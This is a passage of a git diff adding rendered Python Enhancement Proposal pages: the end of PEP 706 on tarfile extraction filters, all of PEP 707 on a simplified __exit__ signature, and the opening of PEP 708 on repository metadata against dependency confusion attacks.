+    my_tar.extract(path, filter=filter_func)
+
+
+

A simple StatefulFilter example will be added to the docs.
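
+

One possible shape for such a helper, sketched under the assumption that the filter object doubles as a context manager (not necessarily the example that will land in the docs):

+
import tarfile
+
+class StatefulFilter:
+    """A callable filter that counts the members it has passed through."""
+
+    def __enter__(self):
+        self.count = 0
+        return self
+
+    def __call__(self, member: tarfile.TarInfo, path: str) -> tarfile.TarInfo:
+        self.count += 1
+        return member
+
+    def __exit__(self, *exc_info):
+        print(f'{self.count} members extracted')
+
+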

+
+

Note

+

The need for stateful filters is a reason against allowing +registration of custom filter names in addition to 'fully_trusted', +'tar' and 'data'. +With such a mechanism, API for (at least) set-up and tear-down would need +to be set in stone.

+
+
+
+
+

Backwards Compatibility

+

The default behavior of TarFile.extract +and TarFile.extractall +will change, after raising DeprecationWarning for 2 releases +(shortest deprecation period allowed in Python’s +backwards compatibility policy).

+

Additionally, code that relies on tarfile.TarInfo +object identity may break, see TarInfo identity, and offset.

+
+
+

Backporting & Forward Compatibility

+

This feature may be backported to older versions of Python.

+

In CPython, we don’t add warnings to patch releases, so the default +filter should be changed to 'fully_trusted' in backports.

+

Other than that, all of the changes to tarfile should be backported, so +hasattr(tarfile, 'data_filter') becomes a reliable check for all +of the new functionality.

+

Note that CPython’s usual policy is to avoid adding new APIs in security +backports. +This feature does not make sense without a new API +(TarFile.extraction_filter and the filter argument), +so we’ll make an exception. +(See Discourse comment 23149/16 +for details.)

+

Here are examples of code that takes into account that tarfile may or may +not have the proposed feature.

+

When copying these snippets, note that setting extraction_filter +will affect subsequent operations.

+
    +
  • Fully trusted archive:
    my_tarfile.extraction_filter = (lambda member, path: member)
    +my_tarfile.extractall()
    +
    +
    +
  • +
  • Use the 'data' filter if available, but revert to Python 3.11 behavior +('fully_trusted') if this feature is not available:
    my_tarfile.extraction_filter = getattr(tarfile, 'data_filter',
    +                                       (lambda member, path: member))
    +my_tarfile.extractall()
    +
    +
    +

    (This is an unsafe operation, so it should be spelled out explicitly, +ideally with a comment.)

    +
  • +
  • Use the 'data' filter; fail if it is not available:
    my_tarfile.extractall(filter=tarfile.data_filter)
    +
    +
    +

    or:

    +
    my_tarfile.extraction_filter = tarfile.data_filter
    +my_tarfile.extractall()
    +
    +
    +
  • +
  • Use the 'data' filter; warn if it is not available:
    if hasattr(tarfile, 'data_filter'):
    +    my_tarfile.extractall(filter='data')
    +else:
    +    # remove this when no longer needed
    +    warn_the_user('Extracting may be unsafe; consider updating Python')
    +    my_tarfile.extractall()
    +
    +
    +
  • +
+
+
+

Security Implications

+

This proposal improves security, at the expense of backwards compatibility. +In particular, it will help users avoid CVE-2007-4559.

+
+
+

How to Teach This

+

The API, usage notes and tips for further verification will be added to +the documentation. +These should be usable for users who are familiar with archives in general, but +not with the specifics of UNIX filesystems nor the related security issues.

+
+
+

Reference Implementation

+

See pull request #102953 on GitHub.

+
+
+

Rejected Ideas

+
+

SafeTarFile

+

An initial idea from Lars Gustäbel was to provide a separate class that +implements security checks (see gh-65308). +There are two major issues with this approach:

+
    +
  • The name is misleading. General archive operations can never be made “safe” +from all kinds of unwanted behavior, without impacting legitimate use cases.
  • +
  • It does not solve the problem of unsafe defaults.
  • +
+

However, many of the ideas behind SafeTarFile were reused in this PEP.

+
+
+

Add absolute_path option to tarfile

+

Issue gh-73974 asks for adding an absolute_path option to extraction +methods. This would be a minimal change to formally resolve CVE-2007-4559. +It doesn’t go far enough to protect the unaware, nor to empower the diligent +and curious.

+
+
+

Other names for the 'tar' filter

+

The 'tar' filter exposes features specific to UNIX-like filesystems, +so it could be named 'unix'. +Or 'unix-like', 'nix', '*nix', 'posix'?

+

Feature-wise, tar format and UNIX-like filesystem are essentially +equivalent, so tar is a good name.

+
+
+
+

Possible Further Work

+
+

Adding filters to zipfile and shutil.unpack_archive

+

For consistency, zipfile and +shutil.unpack_archive() could gain support +for a filter argument. +However, this would require research that this PEP’s author can’t promise +for Python 3.12.

+

Filters for zipfile would probably not help security. +Zip is used primarily for cross-platform data bundles, and correspondingly, +ZipFile.extract’s defaults +are already similar to what a 'data' filter would do. +A 'fully_trusted' filter, which would newly allow absolute paths and +.. path components, might not be useful for much except +a unified unpack_archive API.

+

Filters should be useful for use cases other than security, but those +would usually need custom filter functions, and those would need API that works +with both TarInfo and +ZipInfo. +That is definitely out of scope of this PEP.

+

If only this PEP is implemented and nothing changes for zipfile, +the effect for callers of unpack_archive is that the default +for tar files is changing from 'fully_trusted' to +the more appropriate 'data'. +In the interim period, Python 3.12-3.13 will emit DeprecationWarning. +That’s annoying, but there are several ways to handle it: e.g. add a +filter argument conditionally, set TarFile.extraction_filter +globally, or ignore/suppress the warning until Python 3.14.

+

Also, since many calls to unpack_archive are likely to be unsafe, +there’s hope that the DeprecationWarning will often turn out to be +a helpful hint to review affected code.

+
+
+
+

Thanks

+

This proposal is based on prior work and discussions by many people, +in particular Lars Gustäbel, Gregory P. Smith, Larry Hastings, Joachim Wagner, +Jan Matejek, Jakub Wilk, Daniel Garcia, Lumír Balhar, Miro Hrončok, +and many others.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0706.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0707/index.html b/pep-0707/index.html new file mode 100644 index 00000000000..52e4d8d1d8c --- /dev/null +++ b/pep-0707/index.html @@ -0,0 +1,511 @@ + + + + + + + + PEP 707 – A simplified signature for __exit__ and __aexit__ | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 707 – A simplified signature for __exit__ and __aexit__

+
+
Author:
+
Irit Katriel <irit at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
18-Feb-2023
+
Python-Version:
+
3.12
+
Post-History:
+
02-Mar-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

Per the SC:

+
+
We discussed the PEP and have decided to reject it. Our thinking was the +magic and risk of potential breakage didn’t warrant the benefits. We are +totally supportive, though, of exploring a potential context manager v2 +API or __leave__.
+
+
+

Abstract

+

This PEP proposes to make the interpreter accept context managers whose +__exit__() / __aexit__() method +takes only a single exception instance, +while continuing to also support the current (typ, exc, tb) signature +for backwards compatibility.

+

This proposal is part of an ongoing effort to remove the redundancy of +the 3-item exception representation from the language, a relic of earlier +Python versions which now confuses language users while adding complexity +and overhead to the interpreter.

+

The proposed implementation uses introspection, which is tailored to the +requirements of this use case. The solution ensures the safety of the new +feature by supporting it only in non-ambiguous cases. In particular, any +signature that could accept three arguments is assumed to expect them.

+

Because reliable introspection of callables is not currently possible in +Python, the solution proposed here is limited in that only the common types +of single-arg callables will be identified as such, while some of the more +esoteric ones will continue to be called with three arguments. This +imperfect solution was chosen among several imperfect alternatives in the +spirit of practicality. It is my hope that the discussion about this PEP +will explore the other options and lead us to the best way forward, which +may well be to remain with our imperfect status quo.

+
+
+

Motivation

+

In the past, an exception was represented in many parts of Python by a +tuple of three elements: the type of the exception, its value, and its +traceback. While there were good reasons for this design at the time, +they no longer hold because the type and traceback can now be reliably +deduced from the exception instance. Over the last few years we saw +several efforts to simplify the representation of exceptions.

+

Since 3.10 in CPython PR #70577, +the traceback module’s functions accept either a 3-tuple +as described above, or just an exception instance as a single argument.

+

Internally, the interpreter no longer represents exceptions as a triplet. +This was removed for the handled exception in 3.11 and +for the raised exception in 3.12. As a consequence, +several APIs that expose the triplet can now be replaced by +simpler alternatives:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Legacy APIAlternative
Get handled exception (Python)sys.exc_info()sys.exception()
Get handled exception (C)PyErr_GetExcInfo()PyErr_GetHandledException()
Set handled exception (C)PyErr_SetExcInfo()PyErr_SetHandledException()
Get raised exception (C)PyErr_Fetch()PyErr_GetRaisedException()
Set raised exception (C)PyErr_Restore()PyErr_SetRaisedException()
Construct an exception instance from the 3-tuple (C)PyErr_NormalizeException()N/A
+

The current proposal is a step in this process, and considers the way +forward for one more case in which the 3-tuple representation has +leaked to the language. The motivation for all this work is twofold.

+
+

Simplify the implementation of the language

+

The simplification gained by reducing the interpreter’s internal +representation of the handled exception to a single object was significant. +Previously, the interpreter needed to push onto/pop +from the stack three items whenever it did anything with exceptions. +This increased stack depth (adding pressure on caches and registers) and +complicated some of the bytecodes. Reducing this to one item +removed about 100 lines of code +from ceval.c (the interpreter’s eval loop implementation), and it was later +followed by the removal of the POP_EXCEPT_AND_RERAISE opcode which has +become simple enough to be replaced by generic stack manipulation instructions. Micro-benchmarks showed +a speedup of about 10% for catching and raising an exception, as well as +for creating generators. +To summarize, removing this redundancy in Python’s internals simplified the +interpreter and made it faster.

+

The performance of invoking __exit__/__aexit__ when leaving +a context manager can be also improved by replacing a multi-arg function +call with a single-arg one. Micro-benchmarks showed that entering and exiting +a context manager with single-arg __exit__ is about 13% faster.

+
+
+

Simplify the language itself

+

One of the reasons for the popularity of Python is its simplicity. The +sys.exc_info() triplet is cryptic for new learners, +and the redundancy in it is confusing for those who do understand it.

+

It will take multiple releases to get to a point where we can think of +deprecating sys.exc_info(). However, we can relatively quickly reach a +stage where new learners do not need to know about it, or about the 3-tuple +representation, at least until they are maintaining legacy code.

+
+
+
+

Rationale

+

The only reason to object today to the removal of the last remaining +appearances of the 3-tuple from the language is concern about the +disruption that such changes can bring. The goal of this PEP is to propose +a safe, gradual and minimally disruptive way to make this change in the +case of __exit__, and with this to initiate a discussion of our options +for evolving its method signature.

+

In the case of the traceback module’s API, evolving the +functions to have a hybrid signature is relatively straightforward and +safe. The functions take one positional and two optional arguments, and +interpret them according to their types. This is safe when sentinels +are used for default values. The signatures of callbacks, which are +defined by the user’s program, are harder to evolve.
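
+

A sketch of the sentinel technique mentioned above (simplified, not the exact traceback implementation):

+
_sentinel = object()
+
+def format_exception(exc, /, value=_sentinel, tb=_sentinel):
+    if (value is _sentinel) != (tb is _sentinel):
+        raise ValueError('Both or neither of value and tb must be given')
+    if value is _sentinel:
+        # New style: exc is an exception instance.
+        typ, value, tb = type(exc), exc, exc.__traceback__
+    else:
+        # Legacy style: exc is the exception type.
+        typ = exc
+    ...  # format using typ, value and tb
+
+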

+

The safest option is to make the user explicitly indicate which signature +the callback is expecting, by marking it with an additional attribute or +giving it a different name. For example, we could make the interpreter +look for a __leave__ method on the context manager, and call it with +a single arg if it exists (otherwise, it looks for __exit__ and +continues as it does now). The introspection-based alternative proposed +here intends to make it more convenient for users to write new code, +because they can just use the single-arg version and remain unaware of +the legacy API. However, if the limitations of introspection are found +to be too severe, we should consider an explicit option. Having both +__exit__ and __leave__ around for 5-10 years with similar +functionality is not ideal, but it is an option.

+

Let us now examine the limitations of the current proposal. It identifies +2-arg Python functions and METH_O C functions as having a single-arg +signature, and assumes that anything else is expecting 3 args. Obviously +it is possible to create false negatives for this heuristic (single-arg +callables that it will not identify). Context managers written in this +way won’t work; they will continue to fail as they do now, because their +__exit__ function will be called with three arguments.

+

I believe that it will not be a problem in practice. First, all working +code will continue to work, so this is a limitation on new code rather +than a problem impacting existing code. Second, exotic callable types are +rarely used for __exit__ and if one is needed, it can always be wrapped +by a plain vanilla method that delegates to the callable. For example, we +can write this:

+
class C:
+   __enter__ = lambda self: self
+   __exit__ = ExoticCallable()
+
+
+

as follows:

+
class CM:
+   __enter__ = lambda self: self
+   _exit = ExoticCallable()
+   __exit__ = lambda self, exc: CM._exit(exc)
+
+
+

While discussing the real-world impact of the problem in this PEP, it is +worth noting that most __exit__ functions don’t do anything with their +arguments. Typically, a context manager is implemented to ensure that some +cleanup actions take place upon exit. It is rarely appropriate for the +__exit__ function to handle exceptions raised within the context, and +they are typically allowed to propagate out of __exit__ to the calling +function. This means that most __exit__ functions do not access their +arguments at all, and we should take this into account when trying to +assess the impact of different solutions on Python’s userbase.

+
+
+

Specification

+

A context manager’s __exit__/__aexit__ method can have a single-arg +signature, in which case it is invoked by the interpreter with the argument +equal to an exception instance or None:

+
>>> class C:
+...     def __enter__(self):
+...         return self
+...     def __exit__(self, exc):
+...         print(f'__exit__ called with: {exc!r}')
+...
+>>> with C():
+...     pass
+...
+__exit__ called with: None
+>>> with C():
+...     1/0
+...
+__exit__ called with: ZeroDivisionError('division by zero')
+Traceback (most recent call last):
+  File "<stdin>", line 2, in <module>
+ZeroDivisionError: division by zero
+
+
+

If __exit__/__aexit__ has any other signature, it is invoked with +the 3-tuple (typ, exc, tb) as happens now:

+
>>> class C:
+...     def __enter__(self):
+...         return self
+...     def __exit__(self, *exc):
+...         print(f'__exit__ called with: {exc!r}')
+...
+>>> with C():
+...     pass
+...
+__exit__ called with: (None, None, None)
+>>> with C():
+...     1/0
+...
+__exit__ called with: (<class 'ZeroDivisionError'>, ZeroDivisionError('division by zero'), <traceback object at 0x1039cb570>)
+Traceback (most recent call last):
+  File "<stdin>", line 2, in <module>
+ZeroDivisionError: division by zero
+
+
+

These __exit__ methods will also be called with a 3-tuple:

+
def __exit__(self, typ, *exc):
+    pass
+
+def __exit__(self, typ, exc, tb):
+    pass
+
+
+

A reference implementation is provided in +CPython PR #101995.

+

When the interpreter reaches the end of the scope of a context manager, +and it is about to call the relevant __exit__ or __aexit__ function, +it introspects this function to determine whether it is the single-arg +or the legacy 3-arg version. In the draft PR, this introspection is performed +by the is_legacy___exit__ function:

+
static int is_legacy___exit__(PyObject *exit_func) {
+    if (PyMethod_Check(exit_func)) {
+        PyObject *func = PyMethod_GET_FUNCTION(exit_func);
+        if (PyFunction_Check(func)) {
+            PyCodeObject *code = (PyCodeObject*)PyFunction_GetCode(func);
+            if (code->co_argcount == 2 && !(code->co_flags & CO_VARARGS)) {
+                /* Python method that expects self + one more arg */
+                return false;
+            }
+        }
+    }
+    else if (PyCFunction_Check(exit_func)) {
+        if (PyCFunction_GET_FLAGS(exit_func) == METH_O) {
+            /* C function declared as single-arg */
+            return false;
+         }
+    }
+    return true;
+}
+
+
+

It is important to note that this is not a generic introspection function, but +rather one which is specifically designed for our use case. We know that +exit_func is an attribute of the context manager class (taken from the +type of the object that provided __enter__), and it is typically a function. +Furthermore, for this to be useful we need to identify enough single-arg forms, +but not necessarily all of them. What is critical for backwards compatibility is +that we will never misidentify a legacy exit_func as a single-arg one. So, +for example, __exit__(self, *args) and __exit__(self, exc_type, *args) +both have the legacy form, even though they could be invoked with one arg.

+

In summary, an exit_func will be invoked with a single arg if:

+
    +
  • It is a PyMethod with argcount 2 (to count self) and no vararg, or
  • +
  • it is a PyCFunction with the METH_O flag.
  • +
+

Note that any performance cost of the introspection can be mitigated via +specialization, so it won’t be a problem if we need to make it more +sophisticated than this for some reason.

+
+
+

Backwards Compatibility

+

All context managers that previously worked will continue to work in the +same way because the interpreter will call them with three args whenever +they can accept three args. There may be context managers that previously +did not work because their exit_func expected one argument, so the call +to __exit__ would have caused a TypeError exception to be raised, +and now the call would succeed. This could theoretically change the +behaviour of existing code, but it is unlikely to be a problem in practice.

+

The backwards compatibility concerns will show up in some cases when libraries +try to migrate their context managers from the multi-arg to the single-arg +signature. If __exit__ or __aexit__ is called by any code other than +the interpreter’s eval loop, the introspection does not automatically happen. +For example, this will occur where a context manager is subclassed and its +__exit__ method is called directly from the derived __exit__. Such +context managers will need to migrate to the single-arg version with their +users, and may choose to offer a parallel API rather than breaking the +existing one. Alternatively, a superclass can stay with the signature +__exit__(self, *args), and support both one and three args. Since +most context managers do not use the value of the arguments to __exit__, +and simply allow the exception to propagate onward, this is likely to be the +common approach.
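
+

A sketch of such a superclass:

+
class Base:
+    def __enter__(self):
+        return self
+
+    def __exit__(self, *args):
+        # Works with either calling convention: a single argument
+        # (the exception instance or None) or the legacy three.
+        exc = args[0] if len(args) == 1 else args[1]
+        print(f'cleaning up after {exc!r}')
+        return False  # let any exception propagate
+
+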

+
+
+

Security Implications

+

I am not aware of any.

+
+
+

How to Teach This

+

The language tutorial will present the single-arg version, and the documentation +for context managers will include a section on the legacy signatures of +__exit__ and __aexit__.

+
+
+

Reference Implementation

+

CPython PR #101995 +implements the proposal of this PEP.

+
+
+

Rejected Ideas

+
+

Support __leave__(self, exc)

+

It was considered to support a method by a new name, such as __leave__, +with the new signature. This basically makes the programmer explicitly declare +which signature they are intending to use, and avoid the need for introspection.

+

Different variations of this idea include different amounts of magic that can +help automate the equivalence between __leave__ and __exit__. For example, +Mark Shannon suggested +that the type constructor would add a default implementation for each of __exit__ +and __leave__ whenever one of them is defined on a class. This default +implementation acts as a trampoline that calls the user’s function. This would +make inheritance work seamlessly, as well as the migration from __exit__ to +__leave__ for particular classes. The interpreter would just need to call +__leave__, and that would call __exit__ whenever necessary.

+

While this suggestion has several advantages over the current proposal, it has +two drawbacks. The first is that it adds a new dunder name to the data model, +and we would end up with two dunders that mean the same thing, and only slightly +differ in their signatures. The second is that it would require the migration of +every __exit__ to __leave__, while with introspection it would not be +necessary to change the many __exit__(*arg) methods that do not access their +args. While it is not as simple as a grep for __exit__, it is possible to write +an AST visitor that detects __exit__ methods that can accept multiple arguments, +and which do access them.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0707.rst

+

Last modified: 2023-10-10 15:15:34 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0708/index.html b/pep-0708/index.html new file mode 100644 index 00000000000..ff4589c92fe --- /dev/null +++ b/pep-0708/index.html @@ -0,0 +1,1018 @@ + + + + + + + + PEP 708 – Extending the Repository API to Mitigate Dependency Confusion Attacks | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 708 – Extending the Repository API to Mitigate Dependency Confusion Attacks

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Provisional
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
20-Feb-2023
+
Post-History:
+
01-Feb-2023, +23-Feb-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Provisional Acceptance

+

This PEP has been provisionally accepted, +with the following required conditions before the PEP is made Final:

+
    +
  1. An implementation of the PEP in PyPI (Warehouse) +including any necessary UI elements +to allow project owners to set the tracking data.
  2. +
  3. An implementation of the PEP in at least one repository other than PyPI, +as you can’t really test merging indexes without at least two indexes.
  4. +
  5. An implementation of the PEP in pip, +which supports the intended semantics and can be used to demonstrate +that the expected security benefits are achieved. +This implementation will need to be “off by default” initially, +which means that users will have to opt in to testing it. +Ideally, we should collect explicit positive reports from users +(both project owners and project users) +who have successfully tried out the new feature, +rather than just assuming that “no news is good news”.
  6. +
+
+
+

Abstract

+

Dependency confusion attacks, in which a malicious package is installed instead +of the one the user expected, are an increasingly common supply chain threat. +Most such attacks against Python dependencies, including the +recent PyTorch incident, +occur with multiple package repositories, where a dependency expected to come +from one repository (e.g. a custom index) is installed from another (e.g. PyPI).

+

To help address this problem, this PEP proposes extending the +Simple Repository API +to allow repository operators to indicate that a project found on their +repository “tracks” a project on different repositories, and allows projects to +extend their namespaces across multiple repositories.

+

These features will allow installers to determine when a project being made +available from a particular mix of repositories is expected and should be +allowed, and when it is not and should halt the install with an error to protect +the user.

+
+
+

Motivation

+

There is a long-standing class of attacks that are called “dependency confusion” +attacks, which roughly boil down to an individual user expecting to get package +A, but instead getting B. In Python, this almost always happens due to +the configuration of multiple repositories (possibly including the default of +PyPI), where they expected package A to come from repository X, but +someone is able to publish package B to repository Y under the same +name.

+

Dependency Confusion attacks have long been possible, but they’ve recently +gained press with +public examples of cases where these attacks were successfully executed.

+

A specific example of this is the recent case where the PyTorch project had an +internal package named torchtriton which was only ever intended to be +installed from their repositories located at https://download.pytorch.org/, +but that repository was designed to be used in conjunction with PyPI, and +the name of torchtriton was not claimed on PyPI, which allowed the attacker +to use that name and publish a malicious version.

+

There are a number of ways to mitigate these attacks today, but they all +require that the end user go out of their way to protect themselves, rather than +being protected by default. This means that the vast bulk of users are +likely to remain vulnerable, even if they are ultimately aware of these types of +attacks.

+

Ultimately the underlying cause of these attacks comes from the fact that there +is no globally unique namespace that all Python package names come from. +Instead, each repository is its own distinct namespace, and when given an +“abstract” name such as spam to install, an installer has to implicitly turn +that into a “concrete” name such as pypi.org:spam or example.com:spam. +Currently the standard behavior in Python installation tools is to implicitly +flatten these multiple namespaces into one that contains the files from all +namespaces.

+

This assumption that collapsing the namespaces is what was expected means that +when packages with the same name in different repositories +are authored by different parties (such as in the torchtriton case) +dependency confusion attacks become possible.

+

This is made particularly tricky in that there is no “right” answer; there are +valid use cases both for wanting two repositories merged into one namespace +and for wanting two repositories to be treated as distinct namespaces. This +means that an installer needs some mechanism by which to determine when it +should merge the namespaces of multiple repositories and when it should not, +rather than a blanket always merge or never merge rule.

+

This functionality could be pushed directly to the end user, since ultimately +the end user is the person whose expectations of what gets installed from what +repository actually matters. However, by extending the repository specification +to allow a repository to indicate when it is safe, we can enable individual +projects and repositories to “work by default”, even when their +project naturally spans multiple distinct namespaces, while maintaining the +ability for an installer to be secure by default.

+

On its own, this PEP does not solve dependency confusion attacks, but what it +does do is provide enough information so that installers can prevent them +without causing too much collateral damage to otherwise valid and safe use +cases.

+
+
+

Rationale

+

There are two broad use cases for merging names across repositories that this +PEP seeks to enable.

+

The first use case is when one repository is not defining its own names, but +rather is extending names defined in other repositories. This commonly happens +in cases where a project is being mirrored from one repository to another (see +Bandersnatch) or when a repository +is providing supplementary artifacts for a specific platform (see +Piwheels).

+

In this case neither the repositories nor the projects that are being extended +may have any knowledge that they are being extended or by whom, so this cannot +rely on any information that isn’t present in the “extending” repository itself.

+

The second use case is when the project wants to publish to one “main” +repository, but then have additional repositories that provide binaries for +additional platforms, GPUs, CPUs, etc. Currently wheel tags are not sufficiently +able to express these types of binary compatibility, so projects that wish to +rely on them are forced to set up multiple repositories and have their users +manually configure them to get the correct binaries for their platform, GPU, +CPU, etc.

+

This use case is similar to the first, but the important difference that makes +it a distinct use case on its own is who is providing the information and what +their level of trust is.

+

When a user configures a specific repository (or relies on the default) there +is no ambiguity as to what repository they mean. A repository is identified by +a URL, and through the domain name system, URLs are globally unique identifiers. +This lack of ambiguity means that an installer can assume that the repository +operator is trustworthy and can trust metadata that they provide without needing +to validate it.

+

On the flip side, when an installer finds a name in multiple repositories, it is +ambiguous which of them the installer should trust. This ambiguity means that an +installer cannot assume that the project owner on either repository is +trustworthy and needs to validate that they are indeed the same project and that +one isn’t a dependency confusion attack.

+

Without some way for the installer to validate the metadata between multiple +repositories, projects would be forced into becoming repository operators to +safely support this use case. That wouldn’t be a particularly wrong choice to +make; however, there is a danger that if we don’t provide a way for repositories +to let project owners express this relationship safely, they will be +incentivized to let them use the repository operator’s metadata instead which +would reintroduce the original insecurity.

+
+
+

Specification

+

This specification defines the changes in version 1.2 of the simple repository +API, adding two new metadata items: Repository “Tracks” and “Alternate +Locations”.

+
+

Repository “Tracks” Metadata

+

To enable one repository to host a project that is intended to “extend” a +project that is hosted at other repositories, this PEP allows the extending +repository to declare that a particular project “tracks” a project at another +repository or repositories by adding the URLs of the project and repositories +that it is extending.

+

This is exposed in JSON as the key meta.tracks and in HTML as a meta element +named pypi:tracks on the project-specific URLs ($root/$project/).

+

There are a few key properties that MUST be preserved when using this +metadata:

+
    +
  • It MUST be under the control of the repository operators themselves, not +any individual publisher using that repository.
      +
    • “Repository Operator” can also include anyone who managed the overall +namespace for a particular repository, which may be the case in situations +like hosted repository services where one entity operates the software but +another owns/manages the entire namespace of that repository.
    • +
    +
  • +
  • All URLs MUST represent the same “project” as the project in the extending +repository.
      +
    • This does not mean that they need to serve the same files. It is valid for +them to include binaries built on different platforms, copies with local +patches being applied, etc. This is purposefully left vague as it’s +ultimately up to the expectations that the users have of the repository and +its operators what exactly constitutes the “same” project.
    • +
    +
  • +
  • It MUST point to the repositories that “own” the namespaces, not another +repository that is also tracking that namespace.
  • +
  • It MUST point to a project with the exact same name (after normalization).
  • +
  • It MUST point to the actual URLs for that project, not the base URL for +the extended repositories.
  • +
+

It is NOT required that every name in a repository tracks the same +repository, or that they all track a repository at all. Mixed use repositories +where some names track a repository and some names do not are explicitly +allowed.

+
+

JSON

+
{
+  "meta": {
+    "api-version": "1.2",
+    "tracks": ["https://pypi.org/simple/holygrail/", "https://test.pypi.org/simple/holygrail/"]
+  },
+  "name": "holygrail",
+  "files": [
+    {
+      "filename": "holygrail-1.0.tar.gz",
+      "url": "https://example.com/files/holygrail-1.0.tar.gz",
+      "hashes": {"sha256": "...", "blake2b": "..."},
+      "requires-python": ">=3.7",
+      "yanked": "Had a vulnerability"
+    },
+    {
+      "filename": "holygrail-1.0-py3-none-any.whl",
+      "url": "https://example.com/files/holygrail-1.0-py3-none-any.whl",
+      "hashes": {"sha256": "...", "blake2b": "..."},
+      "requires-python": ">=3.7",
+      "dist-info-metadata": true
+    }
+  ]
+}
+
+
+
+
+

HTML

+
<!DOCTYPE html>
+<html>
+  <head>
+    <meta name="pypi:repository-version" content="1.2">
+    <meta name="pypi:tracks" content="https://pypi.org/simple/holygrail/">
+    <meta name="pypi:tracks" content="https://test.pypi.org/simple/holygrail/">
+  </head>
+  <body>
+    <a href="https://example.com/files/holygrail-1.0.tar.gz#sha256=...">
+    <a href="https://example.com/files/holygrail-1.0-py3-none-any.whl#sha256=...">
+  </body>
+</html>
+
+
+
+
+
+

“Alternate Locations” Metadata

+

To enable a project to extend its namespace across multiple repositories, this PEP allows a project owner to declare a list of “alternate locations” for their project. This is exposed in JSON as the key alternate-locations and in HTML as a meta element named pypi:alternate-locations, which may be used multiple times.

+

There are a few key properties that MUST be observed when using this +metadata:

+
    +
  • In order for this metadata to be trusted, there MUST be agreement between +all locations where that project is found as to what the alternate locations +are.
  • +
  • When using alternate locations, clients MUST implicitly assume that the +url the response was fetched from was included in the list. This means that +if you fetch from https://pypi.org/simple/foo/ and it has an +alternate-locations metadata that has the value +["https://example.com/simple/foo/"], then you MUST treat it as if it +had the value +["https://example.com/simple/foo/", "https://pypi.org/simple/foo/"].
  • +
  • Order of the elements within the array does not have any particular meaning.
  • +
+

When an installer encounters a project that is using the alternate locations +metadata it SHOULD consider that all repositories named are extending the +same namespace across multiple repositories.
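As a non-normative sketch, a client could implement the agreement check between locations like this (the function name is hypothetical):

def merged_alternate_locations(responses: dict[str, list[str]]) -> set[str]:
    # responses maps the URL each project page was fetched from to the
    # alternate-locations metadata found in that response.
    merged: set[str] | None = None
    for fetched_url, alternates in responses.items():
        # The URL the response was fetched from is implicitly included.
        locations = set(alternates) | {fetched_url}
        if merged is None:
            merged = locations
        elif locations != merged:
            # No agreement between all locations: the metadata is untrusted.
            raise ValueError("alternate-locations disagree between repositories")
    return merged or set()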

+
+

Note

+

This alternate locations metadata is project level metadata, not artifact +level metadata, which means it doesn’t get included as part of the core +metadata spec, but rather it is something that each repository will have to +provide a configuration option for (if they choose to support it).

+
+
+

JSON

+
{
+  "meta": {
+    "api-version": "1.2"
+  },
+  "name": "holygrail",
+  "alternate-locations": ["https://pypi.org/simple/holygrail/", "https://test.pypi.org/simple/holygrail/"],
+  "files": [
+    {
+      "filename": "holygrail-1.0.tar.gz",
+      "url": "https://example.com/files/holygrail-1.0.tar.gz",
+      "hashes": {"sha256": "...", "blake2b": "..."},
+      "requires-python": ">=3.7",
+      "yanked": "Had a vulnerability"
+    },
+    {
+      "filename": "holygrail-1.0-py3-none-any.whl",
+      "url": "https://example.com/files/holygrail-1.0-py3-none-any.whl",
+      "hashes": {"sha256": "...", "blake2b": "..."},
+      "requires-python": ">=3.7",
+      "dist-info-metadata": true
+    }
+  ]
+}
+
+
+
+
+

HTML

+
<!DOCTYPE html>
+<html>
+  <head>
+    <meta name="pypi:repository-version" content="1.2">
+    <meta name="pypi:alternate-locations" content="https://pypi.org/simple/holygrail/">
+    <meta name="pypi:alternate-locations" content="https://test.pypi.org/simple/holygrail/">
+  </head>
+  <body>
+    <a href="https://example.com/files/holygrail-1.0.tar.gz#sha256=...">
+    <a href="https://example.com/files/holygrail-1.0-py3-none-any.whl#sha256=...">
+  </body>
+</html>
+
+
+
+
+
+
+

Recommendations

+

This section is non-normative; it provides recommendations to installers on how to interpret this metadata that, in this PEP’s view, provide the best tradeoff between protecting users by default and minimizing breakage to existing workflows. These recommendations are not binding, and installers are free to ignore them, or to apply them selectively as they make sense in their specific situations.

+
+

File Discovery Algorithm

+
+

Note

+

This algorithm is written based on how pip currently discovers files; +other installers may adapt this based on their own discovery procedures.

+
+

Currently the “standard” file discovery algorithm looks something like this:

+
    +
  1. Generate a list of all files across all configured repositories.
  2. +
  3. Filter out any files that do not match known hashes from a lockfile or +requirements file.
  4. +
  5. Filter out any files that do not match the current platform, Python version, +etc.
  6. +
  7. Pass that list of files into the resolver where it will attempt to resolve +the “best” match out of those files, irrespective of which repository it came +from.
  8. +
+

It is recommended that installers change their file discovery algorithm to take +into account the new metadata, and instead do:

+
    +
  1. Generate a list of all files across all configured repositories.
  2. +
  3. Filter out any files that do not match known hashes from a lockfile or +requirements file.
  4. +
  5. If the end user has explicitly told the installer to fetch the project from +specific repositories, filter out all other repositories and skip to 5.
  6. +
  7. Look to see if the discovered files span multiple repositories; if they do +then determine if either “Tracks” or “Alternate Locations” metadata allows +safely merging ALL of the repositories where files were discovered +together. If that metadata does NOT allow that, then generate an error, +otherwise continue.
      +
